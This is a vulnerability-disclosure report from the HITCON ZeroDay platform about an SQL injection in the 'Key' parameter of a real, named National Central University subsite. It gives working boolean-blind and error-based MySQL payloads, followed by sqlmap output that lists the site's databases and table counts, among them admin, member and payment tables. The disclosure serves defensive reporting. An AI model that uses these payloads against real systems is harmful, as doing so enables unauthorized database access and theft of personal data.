国立中央大学某站SQL注入 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00340
  •  發信 Vendor: 國立中央大學
  • Title: 国立中央大学某站SQL注入
  • Introduction: 国立中央大学萌芽功能中心SQL

處理狀態

目前狀態

公開
Last Update : 2018/06/01
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/04/01 01:49:54 : 新提交 (由 Cra5h 更新此狀態)
  • 2018/04/01 15:41:28 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/02 12:01:24 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/02 12:01:25 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/06/01 03:00:15 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-00340
  • 通報者:cra5h (Cra5h)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://ncugfc.ncu.edu.tw/news_cont.php?Key=14

敘述

国立中央大学萌芽功能中心SQL
SQL位置:
http://ncugfc.ncu.edu.tw/news_cont.php?Key=14
Key参数过滤不严导致SQL
Parameter: Key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Key=14 AND 7512=7512

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Key=14 AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(2518=2518,1))),0x7171787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[01:45:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[01:45:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\ncugfc.ncu.edu.tw'

确认影响库:(7个)
[01:46:17] [INFO] fetching database names
[01:46:18] [WARNING] reflective value(s) found and filtering out
[01:46:18] [INFO] used SQL query returns 7 entries
[01:46:18] [INFO] retrieved: information_schema
[01:46:18] [INFO] retrieved: IIC
[01:46:18] [INFO] retrieved: iic_ncu_edu_tw
[01:46:18] [INFO] retrieved: mysql
[01:46:19] [INFO] retrieved: ncugfc_ncu_edu_tw
[01:46:19] [INFO] retrieved: niic
[01:46:19] [INFO] retrieved: pcn888
available databases [7]:
[] IIC
[] iic_ncu_edu_tw
[] information_schema
[] mysql
[] ncugfc_ncu_edu_tw
[] niic
[*] pcn888

[01:46:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\ncugfc.ncu.edu.tw'

查看数据量:
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| user | 2 |
+---------------------------------------+---------+

Database: iic_ncu_edu_tw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| calendar | 1007 |
| address_data | 374 |
| contest_troop_up | 346 |
| contest_troop | 222 |
| avtive_people | 215 |
| news | 184 |
| bz | 123 |
| committee4 | 118 |
| active_unit | 100 |
| record | 75 |
| files | 72 |
| movie | 67 |
| study_process | 59 |
| study2_sign | 50 |
| calendar2 | 48 |
| study3_sign | 48 |
| committee3 | 47 |
| message | 44 |
| download3 | 41 |
| links | 29 |
| service_catalog | 28 |
| news2 | 24 |
| active_sign | 21 |
| about | 17 |
| download2 | 13 |
| study3 | 13 |
| system | 12 |
| send_ok | 11 |
| download4 | 10 |
| adv_links3 | 8 |
| committee | 8 |
| necessary | 8 |
| news3 | 8 |
| adv_links2 | 6 |
| download | 6 |
| committee5 | 5 |
| contest_file | 5 |
| contest_Type | 5 |
| news9 | 5 |
| news_catalog | 5 |
| topphoto | 4 |
| about_member | 3 |
| active_Identity | 3 |
| contest_result | 3 |
| links2 | 3 |
| member | 3 |
| committee2 | 2 |
| link_catalog | 2 |
| study2 | 2 |
| study_sign | 2 |
| active | 1 |
| admin | 1 |
| counter | 1 |
| download5 | 1 |
| epaper | 1 |
| epaperlist | 1 |
| link2_catalog | 1 |
| onnews | 1 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2798 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| PARTITIONS | 198 |
| STATISTICS | 198 |
| TABLES | 198 |
| KEY_COLUMN_USAGE | 191 |
| TABLE_CONSTRAINTS | 169 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| USER_PRIVILEGES | 54 |
| CHARACTER_SETS | 36 |
| PLUGINS | 7 |
| SCHEMATA | 7 |
| ENGINES | 5 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+

Database: ncugfc_ncu_edu_tw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| study_sign | 44 |
| system | 39 |
| module_custom_catalog | 30 |
| login_log | 26 |
| module_files | 25 |
| photo | 19 |
| module_news | 16 |
| module_qa | 14 |
| about | 13 |
| module_label_record | 13 |
| module_catalog | 12 |
| module_news_catalog_files | 12 |
| module_adv_links | 10 |
| module_committee | 8 |
| module_contact | 7 |
| module_ini | 7 |
| orders_status | 7 |
| payment | 5 |
| product_catalog | 5 |
| adv_links | 4 |
| product | 4 |
| member | 3 |
| module_news_catalog | 3 |
| photo_catalog | 3 |
| study | 3 |
| topphoto | 3 |
| admin | 2 |
| module_editer | 2 |
| topphoto2 | 2 |
| counter | 1 |
| seller | 1 |
+---------------------------------------+---------+

[01:48:13] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\ncugfc.ncu.edu.tw'

修補建議

过滤,参数化

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;